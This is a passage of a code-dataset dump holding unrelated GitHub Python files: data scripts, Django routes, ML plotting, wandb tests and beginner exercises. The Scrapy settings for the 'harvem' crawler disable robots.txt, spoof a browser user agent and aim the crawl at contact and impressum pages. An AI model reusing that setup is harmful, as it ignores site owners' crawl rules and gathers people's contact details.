{\"-\"*5}\\n\\n')\n data = get_raw_data(input_file)\n logging.info(f'The file:\\n'\n f'{input_file}\\n'\n f'has the shape {data.shape} with columns:')\n for c in data.columns:\n logging.info(c)\n make_pickle(data, output_file)\n if visualize:\n data.plot(subplots=True, figsize=(10, 16))\n plt.savefig(ROOT_DIR / 'visualization/data' / 'raw_data.png')\n plt.show()\n logging.info(f'\\n\\n{\"-\"*21}')\n return None\n\n\n@click.command()\n@click.option('-in', '--input-file',\n type=click.Path(exists=True),\n default=(ROOT_DIR/'data/raw'/'data.xlsx'),)\n@click.option('-out', '--output-file', \n type=click.Path(),\n default=(ROOT_DIR/'data/interim'/'data.pickle'),)\n@click.option('-v', '--visualize', is_flag=True,)\ndef make_data(input_file, output_file, visualize):\n \"\"\"\n Read raw CSV file and save the dataframe in a Pickle file.\n \"\"\"\n main(input_file, output_file, visualize=visualize)\n return None\n\n\nif __name__ == \"__main__\":\n input_file = ROOT_DIR / 'data/raw/db_villabate_deficit_6.csv'\n output_file = ROOT_DIR / 'data/interim/data.pickle'\n visualize = True\n main(input_file, output_file, visualize=visualize)","repo_name":"fedesss98/ml-to-eta-of-citrus-orchards","sub_path":"eta_ml/eta_ml/data/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3518192637","text":"import json\nfrom os import getcwd, getenv, path\nfrom typing import Dict, Optional\n\nfrom pydantic import BaseModel, field_validator\n\nfrom .node import Node\n\n\nclass Manifest(BaseModel):\n nodes: Dict[str, Node]\n\n @field_validator(\"nodes\")\n @classmethod\n def nodes_are_models(cls, nodes: Dict[str, Node]) -> Dict[str, Node]:\n return {node_name: node for node_name, node in nodes.items() if node.is_model}\n\n @classmethod\n def load(cls, manifest_path: Optional[str] = None):\n \"\"\"Load a Manifest class from manifest file path.\"\"\"\n\n if not manifest_path:\n manifest_path = path.join(\n getenv(\"DBT_TARGET_DIR\", getcwd()), \"manifest.json\"\n )\n\n with open(manifest_path, \"r\", encoding=\"utf8\") as manifest_file:\n manifest_dict = json.load(manifest_file)\n return cls(**manifest_dict)\n\n def get_dependencies(self, node: Node):\n return [\n self.nodes[dependency].name\n for dependency in node.dependencies\n if dependency in self.nodes and self.nodes[dependency].is_model\n ]\n","repo_name":"lgrosjean/dbt-argo","sub_path":"src/dbt_argo/dbt/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35777511984","text":"#Write your code below this line 👇\n#Hint: Remember to import the random module first. 🎲\nimport random\nprint(\" Welcome to my Heads or tails game\")\nchoice = input(\" call it: heads or tails ?:\" )\ncoin = random.randint(0,1)\n\nif coin ==0 :\n print(\"it's heads \")\nelse:\n print(\"it;s tails\") \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"andre-williamson/HEAD-_or-_TAILS-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18036200711","text":"import os\nimport matplotlib.pyplot as plt\n\ntrain_loss = []\ntrain_precision = []\ntrain_recall = []\nval_loss = []\nval_precision = []\nval_recall = []\n\ntrain_axis = []\nval_axis = []\n\n\nwith open('logs\\\\tuned_SuperPoint\\log.txt') as f:\n lines = f.readlines()\n for line in lines:\n if 'train - loss :' in line:\n train_loss.append(float(line[16:]))\n if 'val - loss :' in line:\n val_loss.append(float(line[14:]))\n if 'train - precision :' in line:\n train_precision.append(float(line[21:]))\n if 'val - precision :' in line:\n val_precision.append(float(line[19:]))\n if 'train - recall :' in line:\n train_recall.append(float(line[18:]))\n if 'val - recall :' in line:\n val_recall.append(float(line[16:]))\n\nfor i in range(0,len(train_loss)):\n train_axis.append(90000+400*i)\nfor i in range(0,len(val_loss)):\n val_axis.append(90000+286*i)\n\nplt.subplot(311)\nplt.plot(train_axis,train_loss,label=\"train_loss\")\nplt.plot(val_axis,val_loss,label=\"val_loss\")\nplt.ylabel('loss')\nplt.grid()\nleg0 = plt.legend(loc='upper right')\n\nplt.subplot(312)\nplt.plot(train_axis,train_precision,label=\"train_precision\")\nplt.plot(val_axis,val_precision,label=\"val_precision\")\nplt.ylabel('precision')\nplt.grid()\nleg1 = plt.legend(loc='upper right')\n\nplt.subplot(313)\nplt.plot(train_axis,train_recall,label=\"train_recall\")\nplt.plot(val_axis,val_recall,label=\"val_recall\")\nplt.ylabel('recall')\nleg2 = plt.legend(loc='upper right')\nplt.grid()\nplt.show()","repo_name":"Sioun/SuperPoint2022","sub_path":"visualization_loss.py","file_name":"visualization_loss.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27041769201","text":"\"\"\"SOPORTECM URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom .views import OrdenesView, VordenesView, GarantiasView, VgarantiasView, EordenesView, EgarantiasView, CclienteView, GclienteView, RegistroView, orden_print, ordenes_print, garantia_print, garantias_print, productos_print, ventas_print, venta_print\n#from .views import ProductosView, VordenesView, VgarantiasView, VproductosView\nfrom .views import IndexView, HomeView, AcercaView, ProductosView, VproductosView, EmpleadoView, VempleadosView, UsuarioView, VusuarioView, EusuarioView, DusuarioView, EproductosView, ClienteView, VclienteView, EclienteView, EempleadosView, AusuarioView, VentaView, VventaView, EventaView\n#from .views import CrearUsuarioView, CrearEmpleado, ProductosView\n#from django.views.generic.edit import CrearEmpleado\n\napp_name = 'CCOT'\nurlpatterns = [\n\n #path('', IndexView.as_view(), name='index'),\n path('', HomeView.as_view(), name='home'),\n path('IngresarOrdenes', OrdenesView.as_view(), name='ordenes'),\n path('CrearClientesOrdenes', CclienteView.as_view(), name='occlientes'),\n path('VerOrdenes', VordenesView.as_view(), name='vordenes'),\n path('EditarOrdenes/', EordenesView.as_view(), name='eordenes'),\n path('IngresarGarantias', GarantiasView.as_view(), name='garantias'),\n path('CrearClientesGarantias', GclienteView.as_view(), name='gcclientes'),\n path('VerGarantias', VgarantiasView.as_view(), name='vgarantias'),\n path('EditarGarantias/', EgarantiasView.as_view(), name='egarantias'),\n path('IngresarProductos', ProductosView.as_view(), name='productos'),\n path('VerProductos', VproductosView.as_view(), name='vproductos'),\n path('Acerca', AcercaView.as_view(), name='acerca'),\n path('EditarProductos/', EproductosView.as_view(), name='eproductos'),\n path('IngresarEmpleados', EmpleadoView.as_view(), name='cempleados'),\n path('VerEmpleados', VempleadosView.as_view(), name='vempleados'),\n path('EditarEmpleados/', EempleadosView.as_view(), name='eempleados'),\n path('CrearUsuarios', UsuarioView.as_view(), name='cusuarios'),\n path('VerUsuarios', VusuarioView.as_view(), name='vusuarios'),\n path('EditarUsuarios/', EusuarioView.as_view(), name='eusuarios'),\n path('EliminarUsuarios/', DusuarioView.as_view(), name='dusuarios'),\n path('ActivarUsuarios/', AusuarioView.as_view(), name='ausuarios'),\n path('ActivarUsuarios/', RegistroView.as_view(), name='ausuarios'),\n path('CrearClientes', ClienteView.as_view(), name='cclientes'),\n path('VerClientes', VclienteView.as_view(), name='vclientes'),\n path('EditarClientes/', EclienteView.as_view(), name='eclientes'),\n path('VentaProductos', VentaView.as_view(), name='ventas'),\n path('VerVentas', VventaView.as_view(), name='vventas'),\n path('EditarVentas/', EventaView.as_view(), name='eventas'),\n path('RegistrarUsuario', RegistroView.as_view(), name='rusuarios'),\n path('Ordenes/print', ordenes_print, name='ordenes_print'),\n path('Ordenes/print/', orden_print, name='orden_print_one'),\n path('Garantias/print', garantias_print, name='garantias_print'),\n path('Garantias/print/', garantia_print, name='garantia_print_one'),\n path('Productos/print', productos_print, name='productos_print'),\n path('Ventas/print', ventas_print, name='ventas_print'),\n path('Ventas/print/', venta_print, name='venta_print_one'),\n]\n","repo_name":"Alex1287/COMPUMASTER","sub_path":"SOPORTECM/Apps/CCOT/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19361022955","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom scipy.optimize import minimize\nfrom utils.plot import truncate_colormap\n\nnp.random.RandomState(42)\n\ndef plot_parity(trp, trt, tep, tet, string, limits, comp=[]):\n fig, ax = plt.subplots(1, 1, figsize=(7, 7))\n ax.set_xlabel(r'Exp. current density [mA/cm$^2$]',fontsize=18)\n ax.set_ylabel(r'Pred. current density [mA/cm$^2$]', fontsize=18)\n ax.set_xlim(limits[0], limits[1])\n ax.set_ylim(limits[0], limits[1])\n\n ax.scatter(np.array(trt), np.array(trp), c='grey', s=10, alpha=0.20)\n if len(comp) == 0:\n ax.scatter(np.array(tet), np.array(tep), c='crimson', s=10, alpha=0.80)\n else:\n ax.scatter(np.array(tet), np.array(tep), c=comp, cmap=cmap, s=10, alpha=0.8, vmin=0.0, vmax=0.75)\n\n # plot solid diagonal line\n ax.plot([limits[0], limits[1]], [limits[0], limits[1]], 'k-', linewidth=1.0)\n\n # plot dashed diagonal lines 0.1 eV above and below solid diagonal line\n pm = 0.1\n ax.plot([limits[0], limits[1]], [limits[0] + pm, limits[1] + pm], 'k--', linewidth=1.0, label=r'$\\pm %.2f \\mathrm{eV}$' % pm)\n ax.plot([limits[0] + pm, limits[1]], [limits[0], limits[1] - pm], 'k--', linewidth=1.0)\n\n ax.text(0.01, 0.99, string, family='monospace', fontsize=18, transform=ax.transAxes, va='top', color='k')\n ax.tick_params(labelsize=14)\n\n return fig\n\nwith open(f'dist_libraries/AgPdPtRu_equi.pkl', 'rb') as input:\n equi_dists = pickle.load(input)\n\nlibrary_names = ['AgPdPtRu',\n 'AgPdPt',\n 'AgPdRu',\n 'AgPtRu',\n 'PdPtRu',\n ]\n\nwith open(f'misc/exclude_ids.lst', 'rb') as input:\n exclude_ids = pickle.load(input)\n\npotid = {550:305,650:360,750:416,850:471}\npls = np.linspace(0,0.9,500)\n\ncmap = truncate_colormap(plt.get_cmap('plasma'), minval=0.9, maxval=0.0, n=100)\n\nl, c, a = [], [], []\nfor i, lib in enumerate(library_names):\n elems = [lib[i:i+2] for i in range(len(lib))[::2]]\n\n if lib == 'AgPtRu':\n with open(f'dist_libraries/{lib}_exp_adj.pkl', 'rb') as input:\n dists = pickle.load(input)\n else:\n with open(f'dist_libraries/{lib}_exp.pkl', 'rb') as input:\n dists = pickle.load(input)\n\n for j, d in enumerate(dists):\n comp = [d['comp'][e] for e in ['Ag','Pd','Pt','Ru']]\n if j not in exclude_ids[lib]:\n l.append(d)\n c.append(comp)\n a.append(lib)\n\ndef theo_act(dist, G_opt=0.1, a=-1, b=0.5, eU=0.85):\n kb, T = 8.617e-5, 298.15\n j_ki = b*np.exp((-np.abs(dist - G_opt) + 0.86 - eU) / (kb * T))\n j = a/96**2 * np.sum(1 / (1 / (1-b) + 1 / j_ki))\n return j\n\nbnds = {'a':(-np.inf,0),'b':(0,1),'G_opt':(-0.1,0.3)}\nstart_value = {'a':-1,'b':0.5,'G_opt':0.1}\n\ndef fit(x0, train_ids, dist, params = ['a','b','G_opt'], ads = 'both'):\n p = dict(zip(params, x0))\n t = np.zeros((len(train_ids),2))\n for n, tid in enumerate(train_ids):\n OH = theo_act(l[tid][('ontop', 'OH', dist)], **p)\n O = theo_act(l[tid][('fcc', 'O', dist)], **p)\n s = OH+O if ads == 'both' else locals()[ads]\n t[n,0], t[n,1] = s, -l[tid]['curr'][potid[850]]\n return np.mean(np.abs(np.sum(t,axis=1)))\n\nparam_combinations = [['a'],['a','b'],['a','G_opt'],['a','b','G_opt']]\nads = 'both'\n\nfor i, params in enumerate(param_combinations):\n for dist in ['gross','net']:\n all_test_err = np.array([])\n\n for lib in library_names:\n mask = np.array(a) != lib\n train_ids = np.arange(len(a))[mask]\n test_ids = np.arange(len(a))[~mask]\n \n res = minimize(fit, x0=np.array([start_value[k] for k in params]), args=(train_ids,dist,params,ads), \n tol=1e-8, bounds=[bnds[k] for k in params], method='L-BFGS-B')\n \n p = dict(zip(params, res.x))\n result = [[], []], [[], []]\n\n for j, ids in enumerate([train_ids,test_ids]):\n for tid in ids:\n OH = theo_act(l[tid][('ontop', 'OH', dist)], **p)\n O = theo_act(l[tid][('fcc', 'O', dist)], **p)\n s = OH+O if ads == 'both' else locals()[ads]\n result[j][0].append(s)\n result[j][1].append(l[tid]['curr'][potid[850]])\n\n all_test_err = np.concatenate((all_test_err, np.array(result[1][0]) - np.array(result[1][1])))\n\n if i == 1 and dist == 'gross':\n s0 = f'Testset: {lib}'\n s1 = f'Train MAE = {np.mean(np.abs(np.array(result[0][0]) - np.array(result[0][1]))):.3f} mA'\n s2 = f'Test MAE = {np.mean(np.abs(np.array(result[1][0]) - np.array(result[1][1]))):.3f} mA'\n s3 = [f'{k} = {p[k]:.2f}' for k in p.keys()]\n s = '\\n'.join([s0,s1,s2,*s3])\n \n for k, e in enumerate(['Ag','Pd','Pt','Ru']):\n fig = plot_parity(*result[0],*result[1], s, [-0.7, 0.1], comp=np.array(c)[test_ids,k])\n plt.tight_layout()\n filename = f'plots_parity/{dist}_{i}_{lib}_{e}.png'\n fig.savefig(filename)\n print(f'[SAVED] {filename}')\n plt.close()\n\n print(f'Fit with {params} on {dist} distributions yielded test MAE of {np.mean(np.abs(all_test_err)):.3f} mA')\n","repo_name":"catalyticmaterials/AgPdPtRu_ORR","sub_path":"reproduction/05_fit_volcano.py","file_name":"05_fit_volcano.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14621461011","text":"from django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.authtoken import views as authviews\n\nfrom . import views\n\nrouter = DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'sensors', views.SensorViewSet)\nrouter.register(r'sensor-data', views.SensorDatumViewSet)\nrouter.register(r'events', views.EventViewSet)\nrouter.register(r'sessions', views.SessionViewSet)\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^token-auth/', authviews.obtain_auth_token),\n url(r'^user-info/$', views.user_info),\n url(r'^user-info/(?P[0-9]+)/$', views.UserDetail.as_view())\n]\n","repo_name":"hereisabrams/PhobiaEnemy","sub_path":"api/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27557305168","text":"# import numpy\nimport numpy as np\n# import utils\nfrom .utils import rotationMatrix\n\n# *** Augmenter ***\n\nclass Augmenter(object):\n\n def __init__(self, augment_fn, feats, apply_count=1, **kwargs):\n # save function\n self.fn = augment_fn\n self.feats = feats\n # how many augmentations are created by this\n self.count = apply_count\n # parameters for augmentation function\n self.fn_kwargs = kwargs\n\n def apply(self, pc):\n return [self.fn(pc.copy(), feats=self.feats, **self.fn_kwargs) for _ in range(self.count)]\n\n def __call__(self, pc):\n return self.apply(pc)\n\n def dict(self):\n return {\n \"Augmentation\": self.fn.__name__,\n \"Count\": self.count,\n \"args\": self.fn_kwargs\n }\n\n# *** Augmentation Functions ***\n\ndef augment_mirror_pointcloud(pc, feats):\n for f in ['x', 'nx']:\n if f in feats:\n # get index of feat and invert it\n i = feats.index(f)\n pc[:, i] *= -1\n # return augmented pc\n return pc\n\ndef augment_rotate_pointcloud(pc, feats, rot_axis=['x', 'y', 'z']):\n # assertion\n assert all([(f in feats) for f in rot_axis]), \"All rotation axis must be features\"\n # get random rotations for 3 dimensions\n alphas = [(np.random.uniform(0, np.pi) if f in rot_axis else 0) for f in 'xyz']\n # create rotation matrix\n R = rotationMatrix(*alphas)\n # find features to rotate and apply rotation matrix\n idx = [feats.index(f) for f in 'xyz']\n pc[:, idx] = pc[:, idx] @ R.T\n # find normal features to rotate\n if all([('n'+f) in feats for f in 'xyz']):\n idx = [feats.index('n'+f) for f in 'xyz']\n # apply rotation\n pc[:, idx] = pc[:, idx] @ R.T\n # return rotated pointcloud\n return pc","repo_name":"ndoll1998/Pointnet4Berries","sub_path":"utils/augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73639046507","text":"def kiem_tra_so_may_man(num):\r\n #may_man = True\r\n while num > 0: # n = 5084, n nguyên dương mới làm\r\n new_num = num % 10 # số 4, lấy dư 8\r\n if new_num != 6 and new_num != 8:\r\n return False\r\n num //= 10 # num= num//10\r\n return True\r\n\r\n\r\nn = int(input(\"Nhập số nguyên dương n: \"))\r\nif kiem_tra_so_may_man(n):\r\n print(\"Số may mắn\")\r\nelse:\r\n print(\"Số ko may mắn\")\r\n","repo_name":"tdn548/PythonFoundation","sub_path":"Bai34_Tr7.py","file_name":"Bai34_Tr7.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13709602022","text":"# Scrapy settings for harvem project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n# https://docs.scrapy.org/en/latest/topics/settings.html\n# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'harvem'\n\nSPIDER_MODULES = ['harvem.spiders']\nNEWSPIDER_MODULE = 'harvem.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False #True\n\n#LOG_LEVEL = 'INFO'\n\n# set up Link Extractor's param:Allows \nLEA = [\"contact\", \"about\", \"carreer\", \"touch\", \"connect\" # en \n , \"kapcsolat\", \"koszonto\", \"bemutatkozas\", \"rolunk\", \"impresszum\", \"kezdolap\", \"elerhetoseg\" # hu\n , 'kontakt', 'willkommen', 'einfuhrung', 'uber-uns', 'impressum' # de\n] # add more!! \n#LEA = [] # there are no restrictions, so it crawls all pages\n\nID = 'az' \n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS = 1 #32\n\n# Configure a delay for requests for the same website (default: 0)\n# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\nDOWNLOAD_DELAY = 3\n# The download delay setting will honor only one of:\n#CONCURRENT_REQUESTS_PER_DOMAIN = 1 #16\n#CONCURRENT_REQUESTS_PER_IP = 1 #16\n\n# Disable cookies (enabled by default)\n#COOKIES_ENABLED = False\n\n# Disable Telnet Console (enabled by default)\n#TELNETCONSOLE_ENABLED = False\n\n# Override the default request headers:\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'harvem.middlewares.HarvemSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'harvem.middlewares.HarvemDownloaderMiddleware': 543,\n#}\n\n# Enable or disable extensions\n# See https://docs.scrapy.org/en/latest/topics/extensions.html\n#EXTENSIONS = {\n# 'scrapy.extensions.telnet.TelnetConsole': None,\n#}\n\n# Configure item pipelines\n# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'harvem.pipelines.DuplicatesPipeline': 300,\n}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See https://docs.scrapy.org/en/latest/topics/autothrottle.html\n#AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG = False\n\n# Enable and configure HTTP caching (disabled by default)\n# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED = True\n#HTTPCACHE_EXPIRATION_SECS = 0\n#HTTPCACHE_DIR = 'httpcache'\n#HTTPCACHE_IGNORE_HTTP_CODES = []\n#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n\"\"\" >>> harvem/spiderclasses.py\nSPLASH_URL = 'http://0.0.0.0:8050'\nDOWNLOADER_MIDDLEWARES = {\n 'harvem.middlewares.JustDelayMiddleware': 543,\n 'scrapy_splash.SplashCookiesMiddleware': 723,\n 'scrapy_splash.SplashMiddleware': 725,\n 'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,\n}\nSPIDER_MIDDLEWARES = {\n 'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,\n}\nDUPEFILTER_CLASS = 'scrapy_splash.SplashAwareDupeFilter'\nHTTPCACHE_STORAGE = 'scrapy_splash.SplashAwareFSCacheStorage'\n\"\"\"\n\n","repo_name":"p371k9/harvem","sub_path":"harvem/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395230051","text":"import itertools\nimport os\nimport random\nimport string\nfrom dataclasses import dataclass\n\nfrom wandb import util\nfrom wandb.sdk.internal.file_stream import CRDedupeFilePolicy\nfrom wandb.sdk.lib.file_stream_utils import split_files\n\n\n@dataclass\nclass Chunk:\n data: str = None\n\n\ndef test_split_files():\n def choices(pop, k=1):\n # Note: random.choices was added in python 3.6\n return [random.choice(pop) for _ in range(k)]\n\n def rand_string_list(size):\n width = max(1, int(size / 10))\n num_lines = int(size / width)\n return [\n \"\".join(\n choices(\n string.ascii_letters\n + string.punctuation\n + string.digits\n + string.whitespace,\n k=random.randint(1, width),\n )\n )\n for _ in range(num_lines)\n ]\n\n file_size = 1 # MB\n num_files = 10\n chunk_size = 0.1 # MB\n files = {\n \"file_%s.txt\"\n % i: {\"content\": rand_string_list(int(file_size * 1024 * 1024)), \"offset\": 0}\n for i in range(num_files)\n }\n chunks = list(split_files(files, max_bytes=chunk_size * 1024 * 1024))\n\n # re-combine chunks\n buff = {}\n for c in chunks:\n for k, v in c.items():\n if k in buff:\n buff[k].append(v)\n else:\n buff[k] = [v]\n files2 = {\n k: {\n \"content\": list(\n itertools.chain(\n *(c[\"content\"] for c in sorted(v, key=lambda c: c[\"offset\"]))\n )\n ),\n \"offset\": 0,\n }\n for k, v in buff.items()\n }\n assert files == files2\n\n # Verify chunk offsets (These can be messed up and above assertion would still pass).\n for fname in files:\n offset_size_pairs = [\n (c[fname][\"offset\"], len(c[fname][\"content\"])) for c in chunks if fname in c\n ]\n offset_size_pairs.sort(key=lambda p: p[0])\n assert offset_size_pairs[0][0] == 0\n for i in range(len(offset_size_pairs) - 1):\n assert offset_size_pairs[i + 1][0] == sum(offset_size_pairs[i])\n assert sum(offset_size_pairs[-1]) == len(files[fname][\"content\"])\n\n\ndef test_crdedupe_consecutive_offsets():\n fp = CRDedupeFilePolicy()\n console = {1: \"a\", 2: \"a\", 3: \"a\", 8: \"a\", 12: \"a\", 13: \"a\", 30: \"a\"}\n intervals = fp.get_consecutive_offsets(console)\n print(intervals)\n assert intervals == [[1, 3], [8, 8], [12, 13], [30, 30]]\n\n\ndef test_crdedupe_split_chunk():\n fp = CRDedupeFilePolicy()\n answer = [\n (\"2020-08-25T20:38:36.895321 \", \"this is my line of text\\nsecond line\\n\"),\n (\"ERROR 2020-08-25T20:38:36.895321 \", \"this is my line of text\\nsecond line\\n\"),\n ]\n test_data = [\n \"2020-08-25T20:38:36.895321 this is my line of text\\nsecond line\\n\",\n \"ERROR 2020-08-25T20:38:36.895321 this is my line of text\\nsecond line\\n\",\n ]\n for i, data in enumerate(test_data):\n c = Chunk(data=data)\n prefix, rest = fp.split_chunk(c)\n assert prefix == answer[i][0]\n assert rest == answer[i][1]\n\n\ndef test_crdedupe_process_chunks():\n fp = CRDedupeFilePolicy()\n sep = os.linesep\n files = {\"output.log\": None}\n\n # Test STDERR progress bar updates (\\r lines) overwrite the correct offset.\n # Test STDOUT and STDERR normal messages get appended correctly.\n chunks = [\n Chunk(data=f\"timestamp text{sep}\"),\n Chunk(data=f\"ERROR timestamp error message{sep}\"),\n Chunk(data=f\"ERROR timestamp progress bar{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 1{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 2{sep}\"),\n Chunk(data=f\"timestamp text{sep}text{sep}text{sep}\"),\n Chunk(data=f\"ERROR timestamp error message{sep}\"),\n ]\n ret = fp.process_chunks(chunks)\n want = [\n {\n \"offset\": 0,\n \"content\": [\n \"timestamp text\\n\",\n \"ERROR timestamp error message\\n\",\n \"ERROR timestamp progress bar update 2\\n\",\n \"timestamp text\\n\",\n \"timestamp text\\n\",\n \"timestamp text\\n\",\n \"ERROR timestamp error message\\n\",\n ],\n }\n ]\n print(f\"\\n{ret}\")\n print(want)\n assert ret == want\n files[\"output.log\"] = ret\n file_requests = list(split_files(files, max_bytes=util.MAX_LINE_BYTES))\n assert 1 == len(file_requests)\n\n # Test that STDERR progress bar updates in next list of chunks still\n # maps to the correct offset.\n # Test that we can handle STDOUT progress bars (\\r lines) as well.\n chunks = [\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 3{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar update 4{sep}\"),\n Chunk(data=f\"timestamp \\rstdout progress bar{sep}\"),\n Chunk(data=f\"timestamp text{sep}\"),\n Chunk(data=f\"timestamp \\rstdout progress bar update{sep}\"),\n ]\n ret = fp.process_chunks(chunks)\n want = [\n {\"offset\": 2, \"content\": [\"ERROR timestamp progress bar update 4\\n\"]},\n {\"offset\": 5, \"content\": [\"timestamp stdout progress bar update\\n\"]},\n {\"offset\": 7, \"content\": [\"timestamp text\\n\"]},\n ]\n print(f\"\\n{ret}\")\n print(want)\n assert ret == want\n files[\"output.log\"] = ret\n file_requests = list(split_files(files, max_bytes=util.MAX_LINE_BYTES))\n assert 3 == len(file_requests)\n\n # Test that code handles final progress bar output and correctly\n # offsets any new progress bars.\n chunks = [\n Chunk(data=f\"timestamp text{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rprogress bar final{sep}text{sep}text{sep}\"),\n Chunk(data=f\"ERROR timestamp error message{sep}\"),\n Chunk(data=f\"ERROR timestamp new progress bar{sep}\"),\n Chunk(data=f\"ERROR timestamp \\rnew progress bar update 1{sep}\"),\n ]\n ret = fp.process_chunks(chunks)\n want = [\n {\"offset\": 2, \"content\": [\"ERROR timestamp progress bar final\\n\"]},\n {\n \"offset\": 8,\n \"content\": [\n \"timestamp text\\n\",\n \"ERROR timestamp text\\n\",\n \"ERROR timestamp text\\n\",\n \"ERROR timestamp error message\\n\",\n \"ERROR timestamp new progress bar update 1\\n\",\n ],\n },\n ]\n print(f\"\\n{ret}\")\n print(want)\n assert ret == want\n files[\"output.log\"] = ret\n file_requests = list(split_files(files, max_bytes=util.MAX_LINE_BYTES))\n assert 2 == len(file_requests)\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests/test_file_stream.py","file_name":"test_file_stream.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"41097559891","text":"# Задание 1. Создаем три переменные с одинак. данными и одинаковыми\n# идентификаторами (для начала возьмем целые числа)\nvar_int_1 = 10\nvar_int_2 = 10\nvar_int_3 = 10\nprint(id(var_int_1), id(var_int_2), id(var_int_3), sep='\\n', end='\\n\\n')\n\nvar_str_1, var_str_2, var_str_3 = 'string', 'string', 'string'\nprint(id(var_str_1), id(var_str_2), id(var_str_3), sep='\\n', end='\\n\\n')\n\nvar_float_1, var_float_2, var_float_3 = 8.31, 8.31, 8.31\nprint(id(var_float_1), id(var_float_2), id(var_float_3), sep='\\n', end='\\n\\n')\n\nvar_tuple_1, var_tuple_2 = (1, 2, 3, 4, 5), (1, 2, 3, 4, 5)\nvar_tuple_3 = (1, 2, 3, 4, 5)\nprint(id(var_tuple_1), id(var_tuple_2), id(var_tuple_3), sep='\\n', end='\\n\\n')\n\n# Задание 2. Создаём две переменные с одинаковыми данными и разными id.\nvariable_list_1 = [1, 2, 3, 4, 5]\nvariable_list_2 = [1, 2, 3, 4, 5]\nprint(id(variable_list_1), id(variable_list_2), sep='\\n', end='\\n\\n')\n\n# Задание 3. Чтобы переменные из Задания 1 имели разные id (и одинак. содерж.)\nvar_tuple_1_list = 